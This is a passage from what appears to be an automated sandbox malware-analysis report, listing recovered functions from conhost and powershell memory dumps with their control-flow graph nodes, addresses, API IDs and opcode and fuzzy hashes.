                                          control_flow_graph 538 2779de894d6-2779de89526 539 2779de89724-2779de89762 538->539 540 2779de8952c-2779de8953f 538->540 547 2779de898f0-2779de8990a 539->547 548 2779de89768-2779de89797 539->548 543 2779de89545-2779de89559 540->543 544 2779de8971b-2779de8971f 540->544 545 2779de898ed-2779de898ee 543->545 550 2779de8955f-2779de89590 543->550 544->545 545->547 554 2779de8979d-2779de897bb 548->554 555 2779de898de-2779de898e8 548->555 557 2779de896c4-2779de896ef 550->557 558 2779de89596-2779de895b4 550->558 563 2779de897c1-2779de897cd 554->563 564 2779de898d5-2779de898d6 554->564 555->545 562 2779de896f9-2779de896fc 557->562 567 2779de8965a-2779de896a0 558->567 568 2779de895ba-2779de89617 558->568 562->545 569 2779de89702-2779de89716 562->569 565 2779de897d3-2779de89813 563->565 566 2779de8987e-2779de898c5 563->566 564->555 565->566 585 2779de89815-2779de89821 565->585 575 2779de898d0-2779de898d1 566->575 576 2779de898c7-2779de898c8 566->576 584 2779de896a8-2779de896bc 567->584 586 2779de896a2-2779de896a3 568->586 587 2779de8961d-2779de8961e 568->587 569->545 575->564 576->575 584->557 585->566 588 2779de89823-2779de89829 585->588 586->584 589 2779de89621-2779de89653 587->589 590 2779de8982c-2779de89857 588->590 595 2779de89655-2779de89658 589->595 596 2779de89864-2779de89877 590->596 597 2779de89859-2779de89862 590->597 595->584 596->590 598 2779de89879-2779de8987c 596->598 597->596 598->566 598->575
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 306a5ba0858ec8563746270e14812acecfee1f597f63ee0c00ea7117a0eb1afc
                                          • Instruction ID: 4a294c7c9121ec9f2abe414c11bb93fe294ff49c0ac9442f2a1932adcdcee7e8
                                          • Opcode Fuzzy Hash: 306a5ba0858ec8563746270e14812acecfee1f597f63ee0c00ea7117a0eb1afc
                                          • Instruction Fuzzy Hash: 34E14A3190CA488BDB59DF28C889BAAB7E1FF94310F14466EE94FCB155DF30E9468B41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE88EB2 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: ArrayCreateDestroyInstanceSafe
                                          • String ID:
                                          • API String ID: 3902440814-0
                                          • Opcode ID: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction ID: d340458c94a7f1ea5a0a05db28bcb75cfe7d40792816f722c09352e0a5c1e55c
                                          • Opcode Fuzzy Hash: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction Fuzzy Hash: B6817F3060CB488FD768EF29D888BA6B7E1FFA9301F004A6DD59FC7151EA31E5458B41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C3047B Relevance: 3.0, Strings: 2, Instructions: 460COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 35 7ff9f1c3047b-7ff9f1c304b5 37 7ff9f1c304b9-7ff9f1c304ca call 7ff9f1c30088 35->37 38 7ff9f1c304b7 35->38 41 7ff9f1c304cc 37->41 42 7ff9f1c304ce-7ff9f1c304ed call 7ff9f1c30088 call 7ff9f1c300a8 37->42 38->37 41->42 47 7ff9f1c304ef 42->47 48 7ff9f1c304f1-7ff9f1c30502 call 7ff9f1c30088 42->48 47->48 51 7ff9f1c30504 48->51 52 7ff9f1c30506-7ff9f1c30530 call 7ff9f1c30088 call 7ff9f1c300a8 48->52 51->52 58 7ff9f1c30534-7ff9f1c3055e call 7ff9f1c30088 52->58 59 7ff9f1c30532 52->59 64 7ff9f1c30560 58->64 65 7ff9f1c30562-7ff9f1c3058c call 7ff9f1c30088 58->65 59->58 64->65 70 7ff9f1c30590-7ff9f1c305b0 call 7ff9f1c30088 65->70 71 7ff9f1c3058e 65->71 76 7ff9f1c307bd 70->76 77 7ff9f1c305b6-7ff9f1c305d5 70->77 71->70 78 7ff9f1c307c2-7ff9f1c307c8 76->78 82 7ff9f1c305db-7ff9f1c30617 call 7ff9f1c300a0 77->82 83 7ff9f1c30846-7ff9f1c30861 call 7ff9f1c300a0 77->83 80 7ff9f1c307cc-7ff9f1c307dd call 7ff9f1c30088 78->80 81 7ff9f1c307ca 78->81 89 7ff9f1c307df 80->89 90 7ff9f1c307e1-7ff9f1c30808 call 7ff9f1c30088 80->90 81->80 110 7ff9f1c3069b-7ff9f1c306a1 82->110 111 7ff9f1c3061d-7ff9f1c30623 82->111 99 7ff9f1c308be-7ff9f1c308e4 83->99 100 7ff9f1c30863-7ff9f1c30869 83->100 89->90 102 7ff9f1c3080c-7ff9f1c30839 call 7ff9f1c300a8 90->102 103 7ff9f1c3080a 90->103 104 7ff9f1c3086b 100->104 105 7ff9f1c3086d-7ff9f1c30898 call 7ff9f1c30080 100->105 119 7ff9f1c3083e 102->119 103->102 104->105 136 7ff9f1c3089c-7ff9f1c308bd call 7ff9f1c30088 call 7ff9f1c300b8 105->136 137 7ff9f1c3089a 105->137 117 7ff9f1c306a3 110->117 118 7ff9f1c306a5-7ff9f1c306b6 call 7ff9f1c30088 110->118 115 7ff9f1c30627-7ff9f1c30638 call 7ff9f1c30088 111->115 116 7ff9f1c30625 111->116 127 7ff9f1c3063c-7ff9f1c30663 call 7ff9f1c30088 115->127 128 7ff9f1c3063a 115->128 116->115 117->118 129 7ff9f1c306ba-7ff9f1c306e1 call 7ff9f1c30088 118->129 130 7ff9f1c306b8 118->130 125 7ff9f1c30845 119->125 125->83 142 7ff9f1c30667-7ff9f1c30699 call 7ff9f1c300a8 127->142 143 7ff9f1c30665 127->143 128->127 144 7ff9f1c306e3 129->144 145 7ff9f1c306e5-7ff9f1c30712 call 7ff9f1c300a8 129->145 130->129 136->99 137->136 153 7ff9f1c30717-7ff9f1c30775 142->153 143->142 144->145 145->153 163 7ff9f1c3077f-7ff9f1c30781 153->163 163->78 164 7ff9f1c30783-7ff9f1c30789 163->164 165 7ff9f1c3078b 164->165 166 7ff9f1c3078d-7ff9f1c3079e call 7ff9f1c30088 164->166 165->166 169 7ff9f1c307a0 166->169 170 7ff9f1c307a2-7ff9f1c307b8 call 7ff9f1c30088 call 7ff9f1c300a8 166->170 169->170 170->119
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jtZL$jtZL
                                          • API String ID: 0-4101839450
                                          • Opcode ID: 844e61cc06fe1d8eac80d14a6b2f4eb763a9abf7e181b14d0a02ed3a9dbb701b
                                          • Instruction ID: fd9dcdd4678b2d9b7f30625d2ff840c5a8990cfbf1122d537702ebff97555d74
                                          • Opcode Fuzzy Hash: 844e61cc06fe1d8eac80d14a6b2f4eb763a9abf7e181b14d0a02ed3a9dbb701b
                                          • Instruction Fuzzy Hash: 0BE19321A1CA494FF798F73880567B876D1EF56340F2100BAD41DC72E3DE6A7C958B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE883BA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 386 2779de883ba-2779de883dd LoadLibraryA 387 2779de883df-2779de883e4 386->387 388 2779de883e9-2779de883fc 386->388 389 2779de884c0-2779de884d0 387->389 391 2779de88402-2779de88413 388->391 392 2779de884be 388->392 391->392 393 2779de88419-2779de88431 391->393 392->389 393->392 395 2779de88437-2779de8846b call 2779de8a85e 393->395 395->392 400 2779de8846d-2779de8847e 395->400 400->392 401 2779de88480-2779de88497 400->401 401->392 403 2779de88499-2779de884b9 call 2779de8a85e 401->403 403->387
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction ID: f8d96b013e1aaa822f9adda4bcdc19b2453f2f7f4bc28e9f898205526400b0ce
                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction Fuzzy Hash: 8131A63130CA4C8FEB58AA69E8893AA73D5FBD8310F001159ED4FC3286DD64ED0687C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C312AD Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 407 7ff9f1c312ad-7ff9f1c312b9 408 7ff9f1c312bb 407->408 409 7ff9f1c312bc-7ff9f1c312cd 407->409 408->409 410 7ff9f1c312cf 409->410 411 7ff9f1c312d0-7ff9f1c31313 409->411 410->411 413 7ff9f1c31317-7ff9f1c31333 call 7ff9f1c30e60 411->413 414 7ff9f1c31315 411->414 418 7ff9f1c3134b-7ff9f1c31369 413->418 419 7ff9f1c31335-7ff9f1c31349 413->419 414->413 423 7ff9f1c3136b-7ff9f1c31373 418->423 424 7ff9f1c3137a-7ff9f1c31392 418->424 419->418 423->424 426 7ff9f1c31394 424->426 427 7ff9f1c31396-7ff9f1c313b6 call 7ff9f1c30e60 424->427 426->427 431 7ff9f1c313b8-7ff9f1c313bd 427->431 432 7ff9f1c313d6-7ff9f1c31404 427->432 431->432 433 7ff9f1c313bf-7ff9f1c313c3 431->433 438 7ff9f1c31408-7ff9f1c31456 432->438 439 7ff9f1c31406 432->439 435 7ff9f1c313ca-7ff9f1c313cf 433->435 435->432 446 7ff9f1c3145c-7ff9f1c3146e 438->446 447 7ff9f1c315be-7ff9f1c315ef call 7ff9f1c315f0 438->447 439->438 451 7ff9f1c31470-7ff9f1c31485 446->451 452 7ff9f1c31487-7ff9f1c3148a 446->452 451->452 455 7ff9f1c31490-7ff9f1c31496 452->455 456 7ff9f1c315a2-7ff9f1c315a3 452->456 457 7ff9f1c3149a-7ff9f1c314a8 455->457 458 7ff9f1c31498 455->458 459 7ff9f1c315ab-7ff9f1c315ad 456->459 457->456 463 7ff9f1c314ae-7ff9f1c314b4 457->463 458->457 459->446 462 7ff9f1c315b3 459->462 462->447 464 7ff9f1c314b8-7ff9f1c314d8 463->464 465 7ff9f1c314b6 463->465 468 7ff9f1c314dc-7ff9f1c31503 call 7ff9f1c30e60 464->468 469 7ff9f1c314da 464->469 465->464 468->456 473 7ff9f1c31509-7ff9f1c3150c 468->473 469->468 474 7ff9f1c31512-7ff9f1c31518 473->474 475 7ff9f1c315b5-7ff9f1c315e0 call 7ff9f1c315f0 473->475 476 7ff9f1c3151c-7ff9f1c3152d call 7ff9f1c30e60 474->476 477 7ff9f1c3151a 474->477 483 7ff9f1c3152f 476->483 484 7ff9f1c31531-7ff9f1c31542 call 7ff9f1c30e60 476->484 477->476 483->484 487 7ff9f1c31544 484->487 488 7ff9f1c31546-7ff9f1c3156c 484->488 487->488 491 7ff9f1c31570-7ff9f1c3159d call 7ff9f1c311f0 488->491 492 7ff9f1c3156e 488->492 491->456 492->491
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H.S
                                          • API String ID: 0-2311013185
                                          • Opcode ID: 3a41fbe276096f8d54006143753828332dcd2c3295041a66fafb116a534e6003
                                          • Instruction ID: 9419ade29d1f475a14dc55f3495434b2986e87c0f1ad45d98f6e6434a8af0eab
                                          • Opcode Fuzzy Hash: 3a41fbe276096f8d54006143753828332dcd2c3295041a66fafb116a534e6003
                                          • Instruction Fuzzy Hash: C2B12A21A2CE894FF795E72C44523B977D2EF86751F2800BAD41EC72D2DE69BC818781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE882AF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 495 2779de882af-2779de882c5 LoadLibraryA 496 2779de882d1-2779de882e4 495->496 497 2779de882c7-2779de882cc 495->497 500 2779de883a6 496->500 501 2779de882ea-2779de882fb 496->501 498 2779de883a8-2779de883b8 497->498 500->498 501->500 502 2779de88301-2779de88319 501->502 502->500 504 2779de8831f-2779de88353 call 2779de8a85e 502->504 504->500 509 2779de88355-2779de88366 504->509 509->500 510 2779de88368-2779de8837f 509->510 510->500 512 2779de88381-2779de883a1 call 2779de8a85e 510->512 512->497
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction ID: f0ddcca3729bb66bceb11a6b69ed794075257d2297a066a5c3ad9d3e2a60f66b
                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction Fuzzy Hash: DA31613130CE488BDB59EA59A8997A973D6E7D8320F000259ED4FD72C9EE60ED468781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE882A2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 516 2779de882a2-2779de882c5 LoadLibraryA 518 2779de882d1-2779de882e4 516->518 519 2779de882c7-2779de882cc 516->519 522 2779de883a6 518->522 523 2779de882ea-2779de882fb 518->523 520 2779de883a8-2779de883b8 519->520 522->520 523->522 524 2779de88301-2779de88319 523->524 524->522 526 2779de8831f-2779de88353 call 2779de8a85e 524->526 526->522 531 2779de88355-2779de88366 526->531 531->522 532 2779de88368-2779de8837f 531->532 532->522 534 2779de88381-2779de883a1 call 2779de8a85e 532->534 534->519
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction ID: b2b16fb6e519b4724366f214e056ad4fdc969f593b080949cd5cb3fe4634b56b
                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction Fuzzy Hash: ADE0D83120CF0D5FF758D59EE88A7B676D8D795271F00002EEA49C2201E05598910391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C300C0 Relevance: .3, Instructions: 269COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 600 7ff9f1c300c0-7ff9f1c30f09 604 7ff9f1c30f0b 600->604 605 7ff9f1c30f0d-7ff9f1c30f36 600->605 604->605 609 7ff9f1c30f81-7ff9f1c30fc5 605->609 610 7ff9f1c30f38-7ff9f1c30f56 605->610 622 7ff9f1c3101b-7ff9f1c31039 609->622 623 7ff9f1c30fc7-7ff9f1c30fca 609->623 614 7ff9f1c30f60-7ff9f1c30f66 610->614 615 7ff9f1c30f58-7ff9f1c30f59 610->615 616 7ff9f1c30f6a-7ff9f1c30f80 614->616 617 7ff9f1c30f68 614->617 615->614 616->609 617->616 630 7ff9f1c3103b 622->630 631 7ff9f1c3103d-7ff9f1c31066 622->631 624 7ff9f1c30fd4-7ff9f1c30fe5 623->624 628 7ff9f1c30fe9-7ff9f1c31019 624->628 629 7ff9f1c30fe7 624->629 634 7ff9f1c3106d-7ff9f1c31110 call 7ff9f1c31111 call 7ff9f1c31152 628->634 629->628 630->631 631->634
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b90d3bd5668bcff010ef658bb8cb4e0d2d5170c730c703a08d8275b9783e218
                                          • Instruction ID: ea07a1d3ce4520380b5faa4dfe6d8d37a7eff1be64280b10a2c77fed8502c7e8
                                          • Opcode Fuzzy Hash: 1b90d3bd5668bcff010ef658bb8cb4e0d2d5170c730c703a08d8275b9783e218
                                          • Instruction Fuzzy Hash: 20717E31B1CA498FEB88FB6C9446779B7D2EF99701F14417AE05EC3292DE64BC428781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C30EBB Relevance: .2, Instructions: 233COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab801ad01d85fa96d94dbcb9d2966a9bc878a7342849d13f8f1932fb6485ccb0
                                          • Instruction ID: 2b02b79f0a01fbabe31d58fe545b5b66e83f3e8723b3a84452ea8de3ef9a71b0
                                          • Opcode Fuzzy Hash: ab801ad01d85fa96d94dbcb9d2966a9bc878a7342849d13f8f1932fb6485ccb0
                                          • Instruction Fuzzy Hash: 8D618F31B1CA498FEB98EB6C94467B9B7D1EF99710F14417AE04DC32D2DE64AC828781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C30D51 Relevance: .1, Instructions: 145COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29c997cca77a151d10f80b51c4b0b8b0ef586ee699da17bcdf684d3d17d16794
                                          • Instruction ID: 75439e8957bbc43faff20e38fab3ef42ee9943a25630bac1ce0a0ee62b1501f1
                                          • Opcode Fuzzy Hash: 29c997cca77a151d10f80b51c4b0b8b0ef586ee699da17bcdf684d3d17d16794
                                          • Instruction Fuzzy Hash: 87518F3184E6C25FE317D77498A2B547FA0AE03164B2E02EAC0D4CB1E7DA9DA456C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C311EB Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 716 7ff9f1c311eb-7ff9f1c31228 719 7ff9f1c3122f-7ff9f1c3123b 716->719 721 7ff9f1c31240-7ff9f1c3124f 719->721 723 7ff9f1c31259-7ff9f1c31262 721->723 724 7ff9f1c31269-7ff9f1c3126e 723->724 725 7ff9f1c31270 724->725 726 7ff9f1c31278-7ff9f1c31282 724->726 727 7ff9f1c31277 725->727 727->726
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b468943b3a0f49afc29392a2d7477022e603b6143ba651b053ee91d41ae1c1f
                                          • Instruction ID: 8e8015699555361a36d1000279b71bc71c6284741aa3038115abdf9c37fced8e
                                          • Opcode Fuzzy Hash: 7b468943b3a0f49afc29392a2d7477022e603b6143ba651b053ee91d41ae1c1f
                                          • Instruction Fuzzy Hash: 6611273292CA490EDB69B36C90126FA76D1FF56300F04417EE05EC36D3DE59A8054281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C311F0 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 728 7ff9f1c311f0-7ff9f1c31228 730 7ff9f1c3122f-7ff9f1c3123b 728->730 732 7ff9f1c31240-7ff9f1c3124f 730->732 734 7ff9f1c31259-7ff9f1c31262 732->734 735 7ff9f1c31269-7ff9f1c3126e 734->735 736 7ff9f1c31270 735->736 737 7ff9f1c31278-7ff9f1c31282 735->737 738 7ff9f1c31277 736->738 738->737
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23ba4a2b1b254c8c7429c51e16c3ecd6301efec50ae1ae47abf84ad7c0e88b5b
                                          • Instruction ID: 658d4c3ab26d42639e8e04c9f6cff70a711b8f7ed2dc308e33750ab35fb642a9
                                          • Opcode Fuzzy Hash: 23ba4a2b1b254c8c7429c51e16c3ecd6301efec50ae1ae47abf84ad7c0e88b5b
                                          • Instruction Fuzzy Hash: CE112931A2CA490ADB69B32C9016AFA73D0FF56310F44457DE05EC36E3EE59B8064285
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C30E60 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 872e3fe023c6b912e6abb1e2cf06376fcb4c5813ca158bfa35fcc464dca00da1
                                          • Instruction ID: b239f384f4fe21392baeb6fc5e6c2ff126f107e5d9a028d8bdaa99e9d623b555
                                          • Opcode Fuzzy Hash: 872e3fe023c6b912e6abb1e2cf06376fcb4c5813ca158bfa35fcc464dca00da1
                                          • Instruction Fuzzy Hash: 0DE04F21B1CC1D4F9B94F73D5445FA962D3EB9C210B6645B6E40DC3296DD28DC818790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 000002779DE8990E Relevance: .5, Instructions: 485COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6531b67ce70f4808bba5184535e8a35845fbd4cc4a06e56e41443b3282772b6
                                          • Instruction ID: 149160ede7069e84d42234b62b4c6182055ebea41e29981a26d0462dda730aab
                                          • Opcode Fuzzy Hash: d6531b67ce70f4808bba5184535e8a35845fbd4cc4a06e56e41443b3282772b6
                                          • Instruction Fuzzy Hash: 9CE18131A1DE558BEB6CDF298C897A973D1FB54310F54412DDA8EC7281EB34F8428785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE89D6A Relevance: .3, Instructions: 283COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                          • Instruction ID: ae84d8aa5c729f26321395add3dfde4062d6c93bca9db02d4e20ee82bb6e0d62
                                          • Opcode Fuzzy Hash: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                          • Instruction Fuzzy Hash: 25A11E31508A4C8FDB59EF28C889BEA77E5FBA8315F10466EE44ED7160EB30E645CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000002779DE884D2 Relevance: .3, Instructions: 257COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                          • Instruction ID: 39eac9059a1fb314aa348241d08906318bdbd3e20e81c5ecbe604d1085ae4ea1
                                          • Opcode Fuzzy Hash: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                          • Instruction Fuzzy Hash: 1181613161DB498BEB68DF2598997EAB7E4FB58301F00462ED99FC2141DF30E9458BC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 00007FF9F1C2405B Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @ N
                                          • API String ID: 0-1596310659
                                          • Opcode ID: b400e364327ff5ef20cbc0a5beb896dda7498147f9751466d594c1b09071aee9
                                          • Instruction ID: 2f6812d53aaa8e9806a44af1e8dff30e182016dd7aed2043b774850a938d21d1
                                          • Opcode Fuzzy Hash: b400e364327ff5ef20cbc0a5beb896dda7498147f9751466d594c1b09071aee9
                                          • Instruction Fuzzy Hash: B0916832A0CA8A4FE79AD71C58556B57BD2EFA6320F2801BED05DC71D3DE58AC858381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B59E27 Relevance: .7, Instructions: 741COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 965c067d92001e5efb35c23ec11c1e99555fb23eed8e3658406437b115e1152c
                                          • Instruction ID: e5e13278fc900ddb03aed40f8c0d1dcd989e0dfa99023db176f2df6c25f7e4ab
                                          • Opcode Fuzzy Hash: 965c067d92001e5efb35c23ec11c1e99555fb23eed8e3658406437b115e1152c
                                          • Instruction Fuzzy Hash: 1E02C030A08A498FDF85EF2CC495AA97BE1FF59311F54416AD40DD729ACB65F882CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1B587BC Relevance: .5, Instructions: 527COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
